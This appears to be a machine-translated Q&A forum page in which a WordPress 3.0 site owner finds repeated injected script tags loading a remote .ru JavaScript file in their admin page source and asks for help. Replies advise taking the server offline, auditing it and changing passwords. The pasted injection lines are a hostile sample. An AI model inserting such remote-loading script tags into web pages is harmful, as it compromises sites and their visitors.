wordpress 3.0安全性？

2010-08-11 61 views 0 likes

我注意到/ wp-admin今天顯示以下錯誤。

警告：無法修改標頭信息 - （/輸出開始於/www/sites/.../files/html/wp-includes/default-constants.php:299）/ www/sites/..com/files/html/wp-includes/pluggable.php on line 890

我用IE的查看源代碼。我發現了下面的代碼。

script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script> 
<!--661c36e2c5591b25cbc164e7b376623b--> 
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script> 
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script> 
<!--661c36e2c5591b25cbc164e7b376623b--><br />

它看起來像我的網站已被黑客入侵。

我只啓用了cforms插件。

有什麼想法或建議嗎？

來源

2010-08-11 Moon

找到被黑的模塊/表/文件並將其刪除。 – 2010-08-11 18:11:10

回答

將服務器脫機，然後對其運行安全審覈，併爲其上載內容的任何客戶端運行安全審覈。然後更改所有密碼。

來源

2010-08-11 18:20:50 Quentin

Dorward //感謝您的建議。所以..它可能不是由WP或WP插件引起的？ – Moon 2010-08-11 18:23:39

WordPress 3.0.1已經出來，它可能是一個安全更新（我沒有選中），因此可能是漏洞。我對CFForms一無所知。這可能是服務器上的一個不相關的漏洞。它可能是惡意軟件在客戶端上嗅探了一個ftp密碼。這就是安全審計的重點。 – Quentin 2010-08-11 18:26:58

3.0.1不是安全發佈。 – 2010-08-11 18:36:22

相關問題

11. Wordpress登錄安全
12. Spring Security 3.0：方法安全性被忽略
13. WordPress Cookie安全性 - 持久性Cookie comment_author更改爲會話cookie
14. WebSocket安全性？
15. XMLHttpRequest安全性？
16. SQLCipher安全性
17. $ _session安全性
18. ajax安全性？
19. wordpress權限和安全
20. 形式安全wordpress cms
21. Ajax內部的wordpress安全
22. WordPress的PHP安全模式
23. 是我的Wordpress不安全？
24. Wordpress和安全形式
25. Wordpress上的文件安全
26. Grails的3.0和Spring安全錯誤
27. EJB 3.0，是線程安全的嗎？
28. Rhino安全與Oracle和Nhibernate 3.0
29. Spring 3.0安全http GET登錄
30. 春季安全3.0記得我功能